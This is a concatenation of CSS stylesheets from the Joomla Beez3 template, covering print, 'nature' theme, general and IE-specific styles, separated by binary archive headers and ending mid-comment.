ul.tabs li a.linkclosed:hover,ul.tabs li a.linkclosed:active,ul.tabs li a.linkclosed:focus,ul.tabs li a.linkopen:hover,ul.tabs li a.linkopen:active,ul.tabs li a.linkopen:focus
	{
	background: #555;
	color: #fff
}

#footer-inner,#footer {
	background: #f5f5f5;
	box-shadow: 0px 20px 10px #555
}

#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0px 0px 10px #555555;
	color: #fff
}

#footer a {
	color: #fff;
	background: none
}

#bottom a {
	background: none
}

.box1 {
	border-right: solid 1px #ccc
}

.box3 {
	border-left: solid 1px #ccc
}

#bottom  ul li a {
	background-image: none;
	padding-left: 0
}
















/* responsive */
#mobile_select h2 {border:0; margin:-17px 0 0 0; padding:0; background:#0C1D43;text-align:right}
#mobile_select h2 a {
display:inline-block;
font-size:0.8em;
border-radius:4px 4px 0 0;
padding:6px;
font-size:0.75em;
margin-right:5px;
}



@media only screen and (max-width: 480px) {

	img {
  max-width: 100%;
  height: auto;
  border: 0;
  -ms-interpolation-mode: bicubic;
}


	#fontsize{display:none}
	#nav,#wrapper2,#wrapper,.cols-3 .column-1,.cols-3 .column-2,.cols-3 .column-3,#right,.box,#header form
		{
		float: none;
		width: 100%
	}
	#header {padding-top:3em}
	#header form  {margin:0}
	.logoheader {background:#0C1D43; min-height:100px; margin:0}
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100% ;
		min-width:100%;

		margin: 0 0px; background:#095197;
	}
	#header form input {
		float: none; margin-bottom:4px
	}
	#menuwrapper { margin-top:10px; }
	#header ul.menu {position:relative; top:0;left:20px; right:20px; margin:0; width:90%; border-radius:4px}
	#header ul.menu li:first-child a {border-radius: 4px 4px 0 0}
	#header ul.menu li:last-child a {border-radius:0 0 4px 4px }
	#header ul.menu li a:link,
	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc
	}
}

@media only screen and (min-width: 600px) {
}

@media only screen and (min-width: 768px) {
}

@media only screen and (min-width: 992px) {
}

@media only screen and (min-width: 1382px) { /* Styles */
}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5) , only screen and
		(min--moz-device-pixel-ratio: 1.5) , only screen and
	(min-device-pixel-ratio: 1.5) { /* Styles */
}
PK՜�\��A��beez3/css/ie7only.cssnu�[���/**
 * @author  ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */



div.current , fieldset {zoom:1}
dl.tabs ,.tabs dt,.tabs dd
{display:inline}
.contact-links , .js_heading{zoom:1}

legend {margin-left:-7px}

#users-profile-core legend,
#users-profile-custom legend,
.profile-edit legend,
.registration legend
{margin-bottom:15px}

.login-fields input
{width:14em}

#close a
{
	cursor:pointer
}

#close a span
{
	line-height:normal
}
PK՜�\6�9�//beez3/css/print.cssnu�[���/**
 * @author Design & Accessible Team ( Angie Radtke / Robert Deutz )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */


/* not ready */

h1,
#main h1
{
      font-size: 16pt;
      font-weight: bold;
      margin: 0.4em 0 0.5em 0;
      padding:0;
}

h2,
#main h2
{
      font-size: 14pt;
      font-weight: bold;
      margin: 0.2em 0 0.5em 0;
      padding: 0.3em 0.3em 0.3em 0;
}

h3
{
      font-size: 12pt;
      font-weight: bold;
      margin: 0.4em 0 0.2em 0;
}

/* Vermeidung von Seitenumbr�chen direkt nach einer �berschrift */
h1,
h2,
h3
{
      page-break-after: avoid;
}

body
{
  line-height:150%;
  font-family:Arial, Verdana, Helvetica, sans-serif;
}

p,
ul li, ol li,
address,
.category-desc,
table,
label,
dt,
dd
{
  font-size:10pt
}

address
{
	font-style:normal
}

.contact-address address span
{
	display:block
}

a
{
      font-weight: bold;
}

.unseen,
#line,
#header ul,
#breadcrumbs,
.article-info-term,
ul.actions,
#close,
.display-limit,
.moduletable_menu,
.moduletable_js,
.tabouter,
#bottom,
.pagination,
#footer,
#header-image

{
      display: none;
}

.skiplinks,
#suckerfish
{
	display:none !important
}

#header .logoheader
{
	border:0;
}

#header
{
      width: auto;
}

#all #back #header
{
padding-top:0
}


#all
{
      text-align:left;
      border:solid 0px #000
}

#back
{
  border:solid 0px #000;
  padding:0
}

#right
{
      display: block;
}

#header h1#logo
{
  font-size:20pt;
  font-weight:normal
}

#contentarea2,
#contentarea
{
	border: solid 0px #000;
	padding:0 !important
}

#main .blog-featured h1
{
  padding:0 !important;
}

#main #top
{
  overflow:hidden;
  margin-bottom:25pt;
  border:0
}

#main .categories-listalphabet ul
{
	padding-left:0
}

#main .categories-listalphabet ul li
{
	display:inline;
	padding:5pt;
	border-right:solid 1pt #ddd
}

#wrapper
{
	display:block;
	width:100% !important;
}

.item
{
  margin-bottom:30pt
}

.category-desc
{
	margin:15pt 0
}

.items-leading
{
	margin-bottom:30pt
}

#main .items-leading h2,
#main .item h2
{
      font-size: 14pt;
      font-weight: bold;
}

h2 a
{
	text-decoration:none
}

#main h1
{
	padding:5pt
}

#main .readmore a
{
  border:0 !important;
  padding-left:0 !important
}

.image-left {
	float:left;
	margin:0 15pt 5pt 0;
}

table
{
  margin:20pt 0;
  border-collapse:collapse;
  width:90%;
}

table td,
table th
{
  padding:2pt 5pt;
  border:solid 1pt #ddd
}

.items-more h3
{
	padding: 5pt 0;
	font-size:14pt
}

.items-more ol li a
{
	font-weight:normal
}

#nav a.readmore
{
  font-size:10pt
}

#nav .module_content
{
  margin-bottom:20pt;
  border:0 !important;
  padding:0 !important
}

#nav .moduletable ul.menu
{
	border:0;
	list-style-type:none;
	padding:0
}

#nav .moduletable ul.menu,
#nav .moduletable ul.menu ul,
#nav .moduletable ul.menu ul ul
{
	border:0;
	list-style-type:none
}

#nav .moduletable ul.menu ul,
#nav .moduletable ul.menu ul ul
{
	padding-left:15pt
}

#nav .moduletable ul.menu li
{
  border:0
}

#nav .moduletable ul.menu li a,
#nav .moduletable ul.menu li.active ul li a,
#nav .moduletable ul.menu li.active ul li.active ul li a
{
	text-decoration:none;
	border:solid 0px #000
}

ul#archive-items
{
	list-style-type:none;
	padding-left:0
}

.moduletable
{
  margin:20pt 0
}

dl.article-info
{
	line-height:120%;
	font-size:9pt
}

dl.article-info dd
{
	margin-left:0
}

h3.js_heading a img
{
  border:0
}

h3.js_heading,
#bottom h3,
.moduletable h3,
#nav h3
{
  font-size:12pt !important;
}

.category-list
{
	padding:0 !important;
}

.moduletable_js
{
  margin-bottom:20pt
}

.tabouter
{
  border:solid 0px ;
  overflow:hidden;
  margin:20pt 0
}

ul.tabs
{
  padding:0;
}

ul.tabs li.tab
{
  list-style-type:none;
  text-transform:uppercase;
  display:inline;
  border-right:solid 1pt #ddd;
  padding:2pt 10pt
}

ul.tabs li.tab a
{
  text-decoration:none;
}

.tabcontent
{
  padding:10pt
}

.contact-email div
{
	overflow:hidden
}

.contact-email label
{
	border:solid 0px #000;
	float:left;
	width:10em
}

.login div
{
	overflow:hidden
}

.login label
{
	float:left;
	width:10em
}

form fieldset dt
{
	clear:left;
	float:left;
	width:12em;
}

legend
{
	background:#fff;
	font-size:.85em
}

.phrases,
.only
{
	margin-bottom:15pt
}

.newsflash a.readmore:link
{
	border: solid 0pt ;
	font-weight:normal;
	font-size:0.8em;
	text-decoration:none
}

.stats dt
{
	float:left;
	width:10em
}

#footer-outer
{
  border:solid 0px;
  padding:0;
  background:none
}

#bottom
{
  text-align:left
}

#footer-outer #bottom .box .moduletable
{
  border-bottom:solid 1px #ddd;
  padding:10pt 0
}

#footer-outer #bottom .box1,
#footer-outer #bottom .box3
{
  border:0;
}

#bottom ul
{
  list-style-type:none;
  padding:0 !important
}

#bottom ul li
{
  border:solid 0px #c00
}
PK՜�\Q��**beez3/css/nature.cssnu�[���/*
 * @author ( Angie Radtke )
*/


/* ##########################  general  ########################### */

body
{
	font-family: arial, helvetica, sans-serif;
	background:#fff;
	color:#444
}

h3 {
	color: #555
}

h2 a {
	text-decoration: none
}

h2, .moduletable h3 {
	border-bottom: solid 1px #ddd;
}

.items-row h2
{border-top: solid 1px #ddd;
}

a:link,
a:visited
{
	color:#0A5E69
}

a:hover,
a:active,
a:focus
{
	background:#0A5E69;
	color:#FFF;
}

/* ##########################  logo  ########################### */

.logoheader
{
	border-top:solid 1px transparent;
	color:#fff;
	max-width: 1050px;
	margin:37px auto;
	min-height:20px;
	margin-bottom:0;

}
.logoheader h1#logo
{padding:20px 10px 0px 10px; }
.logoheader h1#logo  span.header1 {padding:0}

/* ##########################  header  ########################### */

#all {padding-top:13em}
#line { position:relative; max-width:1050px; margin:0 auto; text-align:right; right:0;  top:0em}
#header
{
	background: #004746; /* Old browsers */
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#185359", endColorstr="#007774");
	background: -moz-linear-gradient(top,  #004746 0%, #0a5e69 25%, #185359 18%); /* FF3.6+ */
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#004746), color-stop(25%,#0a5e69), color-stop(18%,#185359)); /* Chrome,Safari4+ */
	background: -webkit-linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* Chrome10+,Safari5.1+ */
	background: -o-linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* Opera 11.10+ */
	background: -ms-linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* IE10+ */
	background: linear-gradient(top,  #004746 0%,#0a5e69 25%,#185359 18%); /* W3C */
	position:absolute;
	left:0;
	top:0;
	width:99.9%;
	padding:0;
}
/* green background */
.button:hover, button:hover, p.readmore a:hover,
.pagenav a:hover, .pagenav a:active,  .pagenav a:focus,  #advanced-search-toggle:hover,  #advanced-search-toggle:active,  #advanced-search-toggle:focus,
.profile-edit a:hover, .profile-edit a:active, .profile-edit a:focus,
#fontsize a:hover,  #fontsize a:active,  #fontsize a:focus,#mobile_select h2 a
	{

	color: #fff;
	background: #008885; /* Old browsers */


	background-color: hsl(165, 27%, 27%) ;
	 background-repeat: repeat-x;
	  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#008885", endColorstr="#004746");
	   background-image: -khtml-gradient(linear, left top, left bottom, from(#008885), to(#004746));
	   background-image: -moz-linear-gradient(top, #008885, #004746);
background-image: -ms-linear-gradient(top, #008885, #004746);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #008885), color-stop(100%, #004746));
background-image: -webkit-linear-gradient(top, #008885, #004746);
background-image: -o-linear-gradient(top, #008885, #004746);
background-image: linear-gradient(#008885, #004746);
border-color: #004746 #004746 hsl(165, 27%, 22.5%);
text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.29);
-webkit-font-smoothing: antialiased;
}

/* ++++++++++++++ header  menu ++++++++++++++ */

#header ul.menu
{

	border:0;
	list-style-type:none;
	border-radius:0;
	overflow:hidden;
	margin:0 auto ;
	text-align:right;
	position:absolute;
	top:0;
	right:10px;
}

#header ul.menu li
{
	border:0;

}
#header ul.menu a {
	box-shadow:none;
	border-bottom:0
	}
#header ul.menu li a:link,
#header ul.menu li a:visited
{
	color:#fff;
	border:0;
	border-right:solid 1px #237D85;
	box-shadow: none;
	background:transparent;
	padding:10px ;
	display:inline-block
}
#header ul.menu li:first-child a {border-radius:0}
#header ul.menu li a:hover,
#header ul.menu li a:active,
#header ul.menu li a:focus
{
	color:#333;
	background:#bddfb3;
	padding:10px
}

#header ul li.active a:link,
#header ul li.active a:visited
{
	color:#333;
	border-right:solid 1px #237D85;
	background:#bddfb3;
	padding: 10px  ;

}

#fontsize a , #fontsize h3 {color:#fff}
/*  grey background */
.button, button , p.readmore a ,
 .pagenav a:link, .pagenav a:visited, #advanced-search-toggle , .profile-edit a:link,.profile-edit a:visited,  h3.js_heading
 {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
	border:solid 1px #ccc;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: #004746;
}


/* ++++++++++++++++++++++  navigation  ++++++++++++++++++++++++++  */

.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;

}
#header ul.menu {
	border-color: #D5D5D5;
}

ul.menu a:hover,
ul.menu a:active,
ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #004746;

}


/* ++++++++++++++++   highlighting active menuitem  +++++++++++++++++++ */

ul.menu li.active a,ul.menu  li.active ul li.active a,
ul.menu  li.active ul li.active  ul li.active a,
ul.menu  li.active ul li.active  ul li.active ul li.active  a ,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a
{font-weight:bold; }
ul.menu  li.active ul li a,
ul.menu  li.active ul li.active  ul li a,
ul.menu  li.active ul li.active  ul li.active ul li  a,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li a
{font-weight:normal}

ul.menu a
{
	box-shadow:0 1px 0 #fff;
	border-bottom:solid 1px #ddd;

}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom:1px
}

ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;

}

ul.menu ul ul ul ul a {
	background: #fff;
}

/* +++++++++++++++++  content  +++++++++++++++ */


.article-info {
	background-color: #fbfbfb;
	background-image: -moz-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -ms-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff),
		to(#f5f5f5) );
	background-image: -webkit-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -o-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: linear-gradient(top, #ffffff, #f5f5f5);
	background-repeat: repeat-x;
	filter: progid : DXImageTransform.Microsoft.gradient ( startColorstr =
		'#ffffff', endColorstr = '#f5f5f5', GradientType = 0 );
	border: 1px solid #ddd;
	-webkit-box-shadow: inset 0 1px 0 #ffffff;
	-moz-box-shadow: inset 0 1px 0 #ffffff;
	box-shadow: inset 0 1px 0 #ffffff;
}

ul.menu a:link,ul.menu a:visited {
	color: #444;
}


#footer-inner, #footer , #footer-outer {
	background: #f5f5f5;
}
#footer-sub {background:#555;}
#footer {background:#555; max-width:1025px; margin:0 auto; }
#footer a {color:#fff}

.box1
{border-right:solid 1px #ccc}
.box3
{border-left:solid 1px #ccc}
#bottom  ul li a
{background-image:none;
padding-left:0}

/* +++++++++++++++++++++++  SLIDER  ++++++++++++++++++++  */

.panel h3.pane-toggler a
{
	background: url(../images/slider_plus.png) right  top no-repeat;
	color:#333
}
.panel h3.pane-toggler-down a
{
	background: url(../images/slider_minus.png) right  top no-repeat;
	border-bottom:solid 1px #ddd;
	color:#333
}

/*  +++++++++++++++++   Tabs ++++++++++++++++++++++  */

ul.tabs li,
dl.tabs dt h3 a:link,
dl.tabs dt h3 a:visited
{
	background:#f5f5f5 url(../images/nature/box.png) repeat-x;

}
ul.tabs li a:link,
ul.tabs li a:visited,
dl.tabs dt a
{
	color:#333;
	border:solid 1px #ddd; border-bottom:0
}

ul.tabs li a:hover,
ul.tabs li a:active,
ul.tabs li a:focus
{
	color:#000
}

.tabcontent, div.current
{
	background:#fff;
	color:#000;
	border:solid 1px #ddd;
}

.tabcontent .linkclosed
{
	color:#000;
	border-bottom:solid 1px #e5e5e5;
}

ul.tabs li a.linkopen,
dl.tabs dt.open  h3 a:link,
dl.tabs dt.open  h3 a:visited
{
	background:#fff;
	color:#333;
	border-radius: 5px 5px 0px 0px;
}

ul.tabs li a.linkclosed:hover,
ul.tabs li a.linkclosed:active,
ul.tabs li a.linkclosed:focus,
ul.tabs li a.linkopen:hover,
ul.tabs li a.linkopen:active,
ul.tabs li a.linkopen:focus
{
	background:#555;
	color:#fff
}


/* +++++++++++++++++  Pagination +++++++++++++++ */

.pagination span,
.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}

/* active item */
span.pagenav
{
background:#0A5E69;
color:#fff
}

.pagination-start span.pagenav,
.pagination-prev  span.pagenav,
.pagination-end span.pagenav,
.pagination-next span.pagenav

{
background-color:#f5f5f5;
color:#444
}

/* +++++++++++++  table display  Catgegories table, contact etc, ++++++++++++++++++++* */

table {border:solid 1px #ddd}
table th
 {
	background-color: #0A5E69;;
	color: #fff;
}
table th a:link,
table th a:visited
{color:#fff}
tr.odd, tr.cat-list-row1 {background:#f8f8f8}
table  tr:hover td,
table tr:hover th {
  background-color: #FEFDE2;
}

/* responsive */
#mobile_select h2 {border:0; margin:-17px 0 0 0; padding:0; background:#004746;text-align:right}
#mobile_select h2 a {
display:inline-block;
font-size:0.8em;
border-radius:4px 4px 0 0;
padding:6px;
font-size:0.75em;
margin-right:5px;
}

@media only screen and (max-width: 480px) {

	  img {
  max-width: 100%;
  height: auto;
  border: 0;
  -ms-interpolation-mode: bicubic;
}

	#fontsize{display:none}
	#nav,#wrapper2,#wrapper,.cols-3 .column-1,.cols-3 .column-2,.cols-3 .column-3,#right,.box,#header form
		{
		float: none;
		width: 100%
	}
	#header {padding-top:3em; position:relative; margin:0; max-height:auto !important; }
	#header form  {margin:0}
	#all {padding-top:0}
	.logoheader {background:#004746 ; min-height:100px;margin:0 }
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100% ;
		min-width:100%;
		margin: 0 0px;
		background:#0A5E69;
		position:absolute
	}
	#header form input {
		float: none; margin-bottom:4px
	}
	#menuwrapper { margin-top:10px; background:#fff; padding:10px; width:97%}
	#header ul.menu {position:relative; top:0;left:20px; right:20px; margin:0; width:90%; border-radius:4px; text-align:left; border:0}
	#header ul.menu li:first-child a {border-radius: 4px 4px 0 0}
	#header ul.menu li:last-child a {border-radius:0 0 4px 4px }
	#header ul.menu li a:link,
	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-right:0;
		border-bottom: solid 1px #ccc;
		background:#eee;
		color:#444
	}
}

@media only screen and (min-width: 600px) {
}

@media only screen and (min-width: 768px) {
}

@media only screen and (min-width: 992px) {
}

@media only screen and (min-width: 1382px) { /* Styles */
}

@media only screen and (-webkit-min-device-pixel-ratio: 1.5) , only screen and
		(min--moz-device-pixel-ratio: 1.5) , only screen and
	(min-device-pixel-ratio: 1.5) { /* Styles */
}
PK՜�\7�4��)�)beez3/css/general.cssnu�[���/* not ready */

/* -- form validation */
.invalid { border-color: #B94A48;background:#F2DEDE}
label.invalid , label.required  span{ color: #B94A48; background:none
	}

/* -- Joomla edit buttons  Frontendediting*/
#editor-xtd-buttons {
	padding: 0px;
}
.edit tr:hover  td {background:#eee}
.button2-left,
.button2-right,
.button2-left div,
.button2-right div {
	float: left;
}

.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
	display: block;
	float: left;
	color: #666;
	cursor: pointer;
}

.button2-left span,
.button2-right span {
	cursor: default;
	color: #999;
}

.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
	padding: 0 6px;
}

.page span {
	color: #000;
	font-weight: bold;
}


.button2-left,
.button2-right {

	float: left;
	margin-left: 5px;
}


.edit .formelm-buttons {text-align:right}
.edit .formelm-buttons button {background:#D9EDF7; color:#095197;}
.edit .formelm-buttons button:hover {color:#D9EDF7; background:#095197;}
.modal-button:link,
.modal-button:visited,
.button2-left .readmore a:link,
.button2-left .readmore a:visited,
.button2-left .blank a:link,
.button2-left .blank a:visited
{ background-color: #D9EDF7;

	color:#095197;border:solid 1px #BCE8F1; border-top:0; border-radius:0 0 3px 3px;  text-decoration:none; padding:3px}
.button2-left a:hover,
.button2-left .blank a:hover,
.button2-left .readmore a:hover,
.button2-right a:hover {
	text-decoration: none;
	color: #fff;
	background:#095197;
}
.pull-right {
	float: right;
}
.pull-left {
	float: left;
}
.btn-toolbar .btn {
	-moz-border-bottom-colors: none;
	-moz-border-left-colors: none;
	-moz-border-right-colors: none;
	-moz-border-top-colors: none;
	background-color: #D9EDF7;
	border-image: none;
	border-radius: 0 0 3px 3px;
	color: #095197;
	padding: 3px;
	text-decoration: none;
}

div.toggle-editor {

}
/* Caption fixes */
.img_caption .left {
	float: left;
	margin-right: 1em;
}

.img_caption .right {
	float: right;
	margin-left: 1em;
}

.img_caption .left p {
	clear: left;
	text-align: center;
}

.img_caption .right p {
	clear: right;
	text-align: center;
}

.img_caption  {
	text-align: center!important;
}

.img_caption.none {
	margin-left:auto;
	margin-right:auto;
}
/* New captions */
figure {
	display: table;
}
figure.pull-center,
img.pull-center {
	margin-left: auto;
	margin-right: auto;
}
figcaption {
	display: table-caption;
	caption-side: bottom;
}
/* Calendar */
#jform_publish_down_btn {
	width: 18px;
	height: 18px;
	margin-left: 3px;
	background: url(../images/system/calendar.png) no-repeat;
	cursor: pointer;
	vertical-align: middle;
}
#jform_publish_up_btn {
	width: 18px;
	height: 18px;
	margin-left: 3px;
	background: url(../images/system/calendar.png) no-repeat;
	cursor: pointer;
	vertical-align: middle;
}


/* System Messages */

.error
{
	padding:0px;
	margin-bottom: 20px;
}

.error h2
{
	color:#000 !important;
	font-size:1.4em !important;
	text-transform:uppercase;
	padding:0 0 0 0px !important
}

#system-message dt
{
	font-weight: bold;
}
#system-message dd
{
	margin: 0 0 15px 0;
	font-weight: bold;
	text-indent: 0px;
	padding:0
}
#system-message dd ul
{
	color: #000;
	list-style: none;
	padding: 0px;
}
#system-message dd ul li
{
	line-height:1.5em
}

/* System Standard Messages */
#system-message dt.message
{
	position:absolute;
	top:-2000px;
	left:-3000px;
}

#system-message dd.message  ul
{
	background: #fff  url(../images/system/notice-info.png) no-repeat;
	padding-left:40px;
	padding: 10px 10px 10px 40px;
	border: 2px solid #90B203;
	border-radius:10px
}

#system-message dd.message ul li{background:none !important}

/* System Error Messages */
#system-message dt.error
{
	position:absolute;
	top:-2000px;
	left:-3000px;
}

#system-message dd.error ul
{
	background:#fff url(../images/system/notice-alert.png) no-repeat ;
	padding-left:40px;
 	padding: 10px 10px 10px 40px;
	border: 2px solid #990000;
	border-radius:10px

}



/* System Notice Messages */
#system-message dt.notice
{
	position:absolute;
	top:-2000px;
	left:-3000px;
}

#system-message dd.notice  ul
{
	background:#fff url(../images/system/notice-note.png) no-repeat ;
	padding-left:40px;
	padding: 10px 10px 10px 40px;
	border: 2px solid #FAA528;
	border-radius:10px

}
#system-message dd.notice ul { color: #000;margin:10px 0 }

#system-message
{
	margin-bottom: 0px;
	padding: 0;
}

#system-message dt
{
	font-weight: bold;
}

#system-message dd
{
	font-weight: bold;
	padding: 0;
}


.tip-wrap { background:#FEFDE2; font-size:0.8em ; padding:5px; border:solid 1px #ddd; border-radius:3px; box-shadow: 0 1px 5px #ccc }
.tip-title {font-weight:bold}

#all #upload-flash ul li a:hover,
#all .item a:hover span {
	background:#095197;
	color:#fff;
}


/* ##########################  user profile  ########################### */

#users-profile-core,
#users-profile-custom
{
	margin:10px 0 15px 0;
	padding:15px;
}

#users-profile-core dt,
#users-profile-custom dt
{
	float:left;
	width:12em;
	padding:3px 0;


}

#users-profile-core dd,
#users-profile-custom dd
{
	padding:3px 0;
}

#member-profile fieldset,
.registration fieldset
{
	margin:10px 0 15px 0;
	padding:15px;

}

#users-profile-core legend,
#users-profile-custom legend,
.profile-edit legend,
.registration legend
{
	font-weight:bold
}

.profile-edit form#member-profile fieldset dd,
.registration form#member-registration fieldset dd
{ float:none; padding:5px 0}

.profile-edit form#member-profile fieldset dd input,
.profile-edit form#member-profile fieldset dd select,
.registration form#member-registration fieldset dd input
{width:17em}
.profile-edit form#member-profile fieldset dt,
.registration form#member-registration fieldset dt
{padding:5px 5px 5px 0; width:13em}


span.optional
{font-size:0.9em}

/* ##########################  clearing  ########################### */
.clr {
	clear: both;
	overflow: hidden;
	height: 0;
}

/* ##########################  tooltip  ########################### */
.tooltip {
	position: absolute;
	z-index: 103000;
	display: block;
	visibility: visible;
	font-size: 11px;
	line-height: 1.4;
	opacity: 0;
	filter: alpha(opacity=0);
}
.tooltip.in {
	opacity: 0.8;
	filter: alpha(opacity=80);
}
.tooltip.top {
	margin-top: -3px;
	padding: 5px 0;
}
.tooltip.right {
	margin-left: 3px;
	padding: 0 5px;
}
.tooltip.bottom {
	margin-top: 3px;
	padding: 5px 0;
}
.tooltip.left {
	margin-left: -3px;
	padding: 0 5px;
}
.tooltip-inner {
	max-width: 200px;
	padding: 8px;
	color: #fff;
	text-align: left;
	text-decoration: none;
	background-color: #000;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.tooltip-arrow {
	position: absolute;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.tooltip.top .tooltip-arrow {
	bottom: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 5px 5px 0;
	border-top-color: #000;
}
.tooltip.right .tooltip-arrow {
	top: 50%;
	left: 0;
	margin-top: -5px;
	border-width: 5px 5px 5px 0;
	border-right-color: #000;
}
.tooltip.left .tooltip-arrow {
	top: 50%;
	right: 0;
	margin-top: -5px;
	border-width: 5px 0 5px 5px;
	border-left-color: #000;
}
.tooltip.bottom .tooltip-arrow {
	top: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 0 5px 5px;
	border-bottom-color: #000;
}
.element-invisible {
	position: absolute;
	padding: 0;
	margin: 0;
	border: 0;
	height: 1px;
	width: 1px;
	overflow: hidden;
}
#filter-search {
	vertical-align: top;
}
.input-mini {
	width: 60px;
}

/* ##########################  popover  ########################### */
.popover {
	position: absolute;
	top: 0;
	left: 0;
	z-index: 1010;
	display: none;
	max-width: 276px;
	padding: 1px;
	text-align: left;
	background-color: #fff;
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	white-space: normal;
}
.popover.top {
	margin-top: -10px;
}
.popover.right {
	margin-left: 10px;
}
.popover.bottom {
	margin-top: 10px;
}
.popover.left {
	margin-left: -10px;
}
.popover-title {
	margin: 0;
	padding: 8px 14px;
	font-size: 14px;
	font-weight: normal;
	line-height: 18px;
	background-color: #f7f7f7;
	border-bottom: 1px solid #ebebeb;
	-webkit-border-radius: 5px 5px 0 0;
	-moz-border-radius: 5px 5px 0 0;
	border-radius: 5px 5px 0 0;
}
.popover-title:empty {
	display: none;
}
.popover-content {
	padding: 9px 14px;
	min-height: 33px;
}
.popover .arrow,
.popover .arrow:after {
	position: absolute;
	display: block;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.popover .arrow {
	border-width: 11px;
}
.popover .arrow:after {
	border-width: 10px;
	content: "";
}
.popover.top .arrow {
	left: 50%;
	margin-left: -11px;
	border-bottom-width: 0;
	border-top-color: #999;
	border-top-color: rgba(0,0,0,0.25);
	bottom: -11px;
}
.popover.top .arrow:after {
	bottom: 1px;
	margin-left: -10px;
	border-bottom-width: 0;
	border-top-color: #fff;
}
.popover.right .arrow {
	top: 50%;
	left: -11px;
	margin-top: -11px;
	border-left-width: 0;
	border-right-color: #999;
	border-right-color: rgba(0,0,0,0.25);
}
.popover.right .arrow:after {
	left: 1px;
	bottom: -10px;
	border-left-width: 0;
	border-right-color: #fff;
}
.popover.bottom .arrow {
	left: 50%;
	margin-left: -11px;
	border-top-width: 0;
	border-bottom-color: #999;
	border-bottom-color: rgba(0,0,0,0.25);
	top: -11px;
}
.popover.bottom .arrow:after {
	top: 1px;
	margin-left: -10px;
	border-top-width: 0;
	border-bottom-color: #fff;
}
.popover.left .arrow {
	top: 50%;
	right: -11px;
	margin-top: -11px;
	border-right-width: 0;
	border-left-color: #999;
	border-left-color: rgba(0,0,0,0.25);
}
.popover.left .arrow:after {
	right: 1px;
	border-right-width: 0;
	border-left-color: #fff;
	bottom: -10px;
}

/* Bootstrap overrides anhiliation
 * @since 3.2
 */
body#shadow {
    line-height: 1.5em;
}
body .nav-pills > .active > a, body .nav-pills > .active > a:hover, body .nav-pills > .active > a:focus {
    background-color: transparent;
}
body .nav-pills > li > a {
    border-radius: 0px;
    line-height: 1.5em;
}
body a {
    text-decoration: underline;
}
body input[type="text"].search-query {
    line-height: 1.5em;
    height: auto;
    border-radius: 4px;

}
/* Text alignments */
.text-left {
	text-align: left;
}
.text-right {
	text-align: right;
}
.text-center {
	text-align: center;
}

/* Component pop-up */
.container-popup {
	padding: 28px 10px 10px 10px;
}
PK՜�\g�t�+	+	beez3/css/ieonly.cssnu�[���/**

 * @author ( Angie Radtke )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license GNU/GPL, see LICENSE.txt
